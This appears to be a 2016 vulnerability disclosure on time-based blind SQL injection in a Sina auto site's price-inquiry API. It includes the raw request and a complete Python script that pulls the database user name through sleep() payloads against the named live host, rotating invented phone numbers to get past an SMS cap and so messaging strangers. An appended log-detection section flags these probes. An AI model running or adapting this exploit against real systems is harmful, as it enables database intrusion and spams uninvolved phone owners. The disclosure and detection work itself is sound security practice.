2016-03-24: Details reported to the vendor, awaiting vendor handling
2016-03-25: Vendor confirmed; details disclosed to the vendor only
2016-04-04: Details disclosed to core white hats and domain experts
2016-04-14: Details disclosed to regular white hats
2016-04-24: Details disclosed to intern white hats
2016-05-09: Details disclosed to the public
Found this vulnerability by accident yesterday while scrolling Weibo. 380,000 records and you won't give me 20 rank, I'm angry!!! Give me another 10 rank and I'll dig up another one tomorrow, believe it or not.
POST /new/index.php/api/xunjia/AjaxAskPrice HTTP/1.1
Host: weidealer.auto.sina.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 192

info%5Bmobile%5D=13888888889&info%5Bprovince_id%5D=11&info%5Bcity_id%5D=1&info%5Bbrand_id%5D=95&info%5Bsub_brand_id%5D=1661&info%5Bcar_id%5D=18058&info%5Bxname%5D=false&info%5Bask_reffer%5D=67
The injection point is car[id], a time-based blind injection. I then ran it with my own phone number and found that a single phone number can send at most 20 SMS messages; there is a verification step on the phone number field, but user is longer than 20 characters, so phone numbers had to be switched. Sorry to whoever owns the numbers I made up. Verification script attached:
#!/usr/bin/env python
# coding: UTF-8 (๑•̀ㅂ•́)و✧
__author__ = 'T1m0n'
import httplib, time

headers = {
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
    'User-Agent': 'Mozilla/5.0(WindowsNT6.3;Win64;x64;rv:44.0) Gecko / 20100101Firefox / 44.0',
    'Host': 'weidealer.auto.sina.com.cn',
    'Content-Type': 'application/x-www-form-urlencoded',
}
user = ''
payloads = 'abcdefghijklmnopqrstuvwxyz1234567890.@_'
i = 100  # counter for the fresh mobile number used on every request (20-SMS cap per number)
for x in range(1, 24):  # position of the character of user() being tested
    for payload in payloads:
        conn = httplib.HTTPConnection('weidealer.auto.sina.com.cn', 80)
        url = '/new/index.php/api/xunjia/AjaxAskPrice'
        start_time = time.time()
        number = '138345%05d' % i
        body = 'info[mobile]=' + number + '&info[province_id]=11&info[city_id]=1&info[brand_id]=95&info[sub_brand_id]=1661&info[car_id]=18058 AND (SELECT * FROM (SELECT'
        body += '(if(ascii(substr(user(),%d,1))=%d,sleep(5),1)' % (x, ord(payload))
        body += '))zkHd)-- mGEC&info[xname]=false&info[ask_reffer]=67'
        conn.request('POST', url, body, headers)
        res = conn.getresponse().read()
        conn.close()
        print '.',
        i += 1
        # a response delayed by the 5-second sleep means the guessed character is correct
        if time.time() - start_time > 5:
            print payload
            user += payload
            break
print user
After it finishes running, the output looks like this:
user:[email protected]
Filter the input.
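Detection logic for the pattern in this report, added here as an example that is not part of the original post: it decodes AjaxAskPrice POST bodies from constructed log lines (a simplified "src_ip path url_encoded_body" format, an assumption), flags car_id values that are not a plain integer or that carry sleep()/benchmark(), and counts distinct mobile numbers per source, since the 20-SMS cap per number forces the number rotation described above.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Time-based probes depend on these MySQL constructs; car_id itself should only ever be an integer.
TIME_PROBE = re.compile(r"\b(sleep|benchmark)\s*\(", re.I)
INT_ONLY = re.compile(r"^\d+$")

# Constructed sample log, simplified to "src_ip path url_encoded_body" per line (an assumption).
SAMPLE_LOG = [
    "203.0.113.5 /new/index.php/api/xunjia/AjaxAskPrice info%5Bmobile%5D=13888888889&info%5Bcar_id%5D=18058&info%5Bxname%5D=false",
    "203.0.113.9 /new/index.php/api/xunjia/AjaxAskPrice info%5Bmobile%5D=13834500100&info%5Bcar_id%5D=18058%20AND%20(SELECT(if(ascii(substr(user(),1,1))%3D97,sleep(5),1)))--%20x&info%5Bxname%5D=false",
    "203.0.113.9 /new/index.php/api/xunjia/AjaxAskPrice info%5Bmobile%5D=13834500101&info%5Bcar_id%5D=18058%20AND%20(SELECT(if(ascii(substr(user(),1,1))%3D98,SLEEP(5),1)))--%20x&info%5Bxname%5D=false",
    "203.0.113.9 /new/index.php/api/xunjia/AjaxAskPrice info%5Bmobile%5D=13834500102&info%5Bcar_id%5D=18058'&info%5Bxname%5D=false",
]

def parse_body(body):
    """Flatten form fields such as info[car_id]=18058 into {'car_id': '18058'}."""
    fields = {}
    for key, values in parse_qs(body, keep_blank_values=True).items():
        m = re.match(r"^info\[(\w+)\]$", key)
        if m:
            fields[m.group(1)] = values[0]
    return fields

def classify(body):
    """Return a list of finding tags for one POST body (empty list = looks benign)."""
    car_id = parse_body(body).get("car_id", "")
    tags = []
    if not INT_ONLY.match(car_id):
        tags.append("non_numeric_car_id")      # strict integer validation alone would reject this
    if TIME_PROBE.search(car_id):
        tags.append("time_based_sqli_probe")   # sleep()/benchmark() never belong in a car id
    return tags

def scan(log_lines):
    """Tag each AjaxAskPrice request and count distinct mobiles per source (number rotation)."""
    findings = []
    mobiles_per_src = defaultdict(set)
    for line in log_lines:
        src, path, body = line.split(" ", 2)
        if not path.endswith("/api/xunjia/AjaxAskPrice"):
            continue
        mobiles_per_src[src].add(parse_body(body).get("mobile", ""))
        tags = classify(body)
        if tags:
            findings.append((src, tags))
    rotation = {src: len(m) for src, m in mobiles_per_src.items() if len(m) >= 3}
    return findings, rotation
```

The rotation threshold of three distinct numbers per source is an arbitrary value for the sample; tune it against real traffic for the endpoint.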
Severity: Medium
Vulnerability Rank: 6
Confirmed: 2016-03-25 18:25
Thank you for your attention to Sina Security; the issue is being fixed.
None yet.